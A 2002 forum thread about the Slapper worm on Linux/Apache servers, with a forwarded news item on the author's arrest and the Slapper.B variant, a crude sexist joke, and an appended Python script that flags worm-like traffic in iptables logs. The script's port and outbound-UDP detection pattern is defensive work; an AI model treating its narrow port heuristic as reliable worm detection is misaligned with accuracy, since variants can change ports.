Keep watching, you'll see more of this as linux becomes even easier to install and use. Joe User likes it because it's easy to install and comes with lots of services he can run right out of the box. Joe User doesn't do sysadmin work, what do you mean it doesn't update itself?
Automatic update utilities need to keep pace with the ease of use and hands-off administration that people generally apply to a desktop OS like Windows, otherwise we're basically handing all these new users a gun that's already pointed at their heads.
SysAdmin Announcement: Thread Closed (Score:2, Funny)
Time to chroot apache (Score:2, Informative)
Slapper author got caught! (Score:2, Interesting)
Sent: Tuesday, September 24, 2002 9:54 AM
To: firewalls@isc.org
Subject: Slapper worm redux;
Those folks relying upon security through obscurity might well wish to get on the ball and fully patch-up;
September 23 VNUNET.COM.
A suspect has been arrested on suspicion of authoring the Slapper worm. But although the threat of the worm seems to have been short-lived, a new variant is already set to take up where its predecessor left off. Although the ISC's 'most attacked ports' chart no longer features Slapper in its Top 10 a variant, Slapper.B, has been spotted in the wild. Slapper.B has several subtle differences, but is for the most part an updated version of its predecessor. Both worms attempt to exploit a known vulnerability in the Secure Sockets Layer 2.0 (SSLv2) handshake process. The two variants also carry the same payload, a password-protected backdoor and denial of service (DoS) capabilities. ISS's Morgan said that with the new variant on the loose his company had calculated that about 10,000 servers were probably now infected, and that the network was probably going to be used for DoS attacks. He added that it was unlikely the original author created the second worm. "It was significant that source code for the original Slapper was distributed within the computer underground immediately after the worm was detected in the wild," he said.
Source: http://www.vnunet.com/News/1135274
--
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
Slappers. (Score:4, Informative)
A linguistic note for Americans and other aliens....
"Slapper" is an English English term for a woman with an easily exploited hole....
On Onions and Carrots (Score:4, Insightful)
If anyone takes the care to look at the incidents.org site, one may see the facts for himself. Slapper didn't hit the stands. It is far from its Windows cousins, not only in terms of infected machines but also in attacks. And note especially the attacks. In less than 12 hours after Nimda's appearance I had more than 340000 Nimda "visits" on the network I supervised. As far as Slapper is concerned, so far things are nearly at zero. Slapper is in no way a second Nimda.
Re:oh no! (Score:5, Funny)
I wonder how Windows must look then. Yikes!
Re:oh no! (Score:3, Insightful)
I think you're being *way* too paranoid.
What do you think are the chances Microsoft employees are contributing buggy patches to key open source projects, causing buffer overruns and worms?
Almost nil.
Even if they are, the maintainers share the blame for not reviewing them properly.
Re:oh no! (Score:2)
{look of utter fear from the thought that someone would say something like that and be serious.}
Re:Response Time (Score:2)
Err. To compile the webserver. Unless I'm missing something.
Kinda interesting (Score:2)
I wonder if he meant that operating systems will inherently have remote security holes? I'm not so sure that's true, if you're using few servers, simpler ones, and ones not written in C.
Re:Source Code? (Score:3, Informative)
Not good enough, I don't think.
I'm seeing remote ports 2140:2144 being used to attempt to connect to port 443.
So, I'm denying port 443 incoming and monitoring all outgoing unaccounted for udp. (Yes, we were infected.)
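The poster's two observations, connections to port 443 arriving from source ports 2140 to 2144 and otherwise unexplained outbound UDP from the server, translate directly into log checks. As an added example (not the poster's setup and not from the thread), the script below parses iptables LOG-style lines (the KEY=VALUE fields that rule logging writes into syslog) and reports inbound TCP/443 hits whose source port falls in that range, plus outbound UDP to any destination/port pair not on an explicit allow-list. The log lines, the host and resolver addresses, the allow-list and the 9999 port number are all constructed for the example.

```python
"""Flag inbound 443 probes from source ports 2140-2144 and unaccounted outbound UDP.

Added example for this thread. Assumes iptables LOG output (fields such as
IN=, OUT=, SRC=, DST=, PROTO=, SPT=, DPT=) logged to syslog. All sample
lines and addresses below are constructed.
"""
import re
from collections import Counter

KV_RE = re.compile(r"(\w+)=(\S*)")

# Source-port range the poster saw hitting 443; inclusive 2140..2144
SUSPECT_SPT = range(2140, 2145)

# (destination, port) pairs of outbound UDP we can account for.
# Constructed: the server's own DNS resolver only.
ALLOWED_UDP = {("192.0.2.53", 53)}


def parse_iptables_log(line):
    """Return the KEY=VALUE fields of an iptables LOG line as a dict.

    SPT/DPT are converted to int when present. Lines with no such fields
    (other syslog traffic) yield a dict without 'PROTO' and are skipped by
    the caller.
    """
    fields = dict(KV_RE.findall(line))
    for key in ("SPT", "DPT"):
        if fields.get(key, "").isdigit():
            fields[key] = int(fields[key])
    return fields


def triage(lines):
    """Count suspicious inbound 443 hits per source and unaccounted outbound UDP per target."""
    inbound_443 = Counter()
    unaccounted_udp = Counter()
    for line in lines:
        f = parse_iptables_log(line)
        if "PROTO" not in f:
            continue
        # Inbound: IN= is the interface, OUT= is empty.
        if f["PROTO"] == "TCP" and f.get("IN") and f.get("DPT") == 443 \
                and f.get("SPT") in SUSPECT_SPT:
            inbound_443[f["SRC"]] += 1
        # Outbound: OUT= is the interface, IN= is empty.
        elif f["PROTO"] == "UDP" and f.get("OUT") \
                and (f.get("DST"), f.get("DPT")) not in ALLOWED_UDP:
            unaccounted_udp[(f["DST"], f["DPT"])] += 1
    return {
        "inbound_443_scanners": dict(inbound_443),
        "unaccounted_udp": dict(unaccounted_udp),
    }


# Constructed sample: three probes from one source using the 2140-2144
# range, one ordinary client on an ephemeral port, one allowed DNS query,
# two UDP datagrams to an unlisted host/port, and one unrelated syslog line.
SAMPLE_LOG = [
    "Sep 24 09:54:01 web kernel: IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=2140 DPT=443 SYN",
    "Sep 24 09:54:02 web kernel: IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=2141 DPT=443 SYN",
    "Sep 24 09:54:03 web kernel: IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=2144 DPT=443 SYN",
    "Sep 24 09:54:30 web kernel: IN=eth0 OUT= SRC=198.51.100.8 DST=192.0.2.10 PROTO=TCP SPT=40000 DPT=443 SYN",
    "Sep 24 09:55:10 web kernel: IN= OUT=eth0 SRC=192.0.2.10 DST=192.0.2.53 PROTO=UDP SPT=1025 DPT=53",
    "Sep 24 09:55:11 web kernel: IN= OUT=eth0 SRC=192.0.2.10 DST=203.0.113.9 PROTO=UDP SPT=1026 DPT=9999",
    "Sep 24 09:55:12 web kernel: IN= OUT=eth0 SRC=192.0.2.10 DST=203.0.113.9 PROTO=UDP SPT=1026 DPT=9999",
    "Sep 24 09:55:13 web sshd[123]: Accepted publickey for admin from 192.0.2.20",
]

if __name__ == "__main__":
    for k, v in triage(SAMPLE_LOG).items():
        print(k, v)
```

The allow-list is the important design choice: on a web server the set of legitimate outbound UDP destinations is tiny (DNS, maybe NTP), so anything outside it is worth a look regardless of which worm is current. The inbound check depends on the observed 2140 to 2144 pattern and would need updating if a variant changed ports.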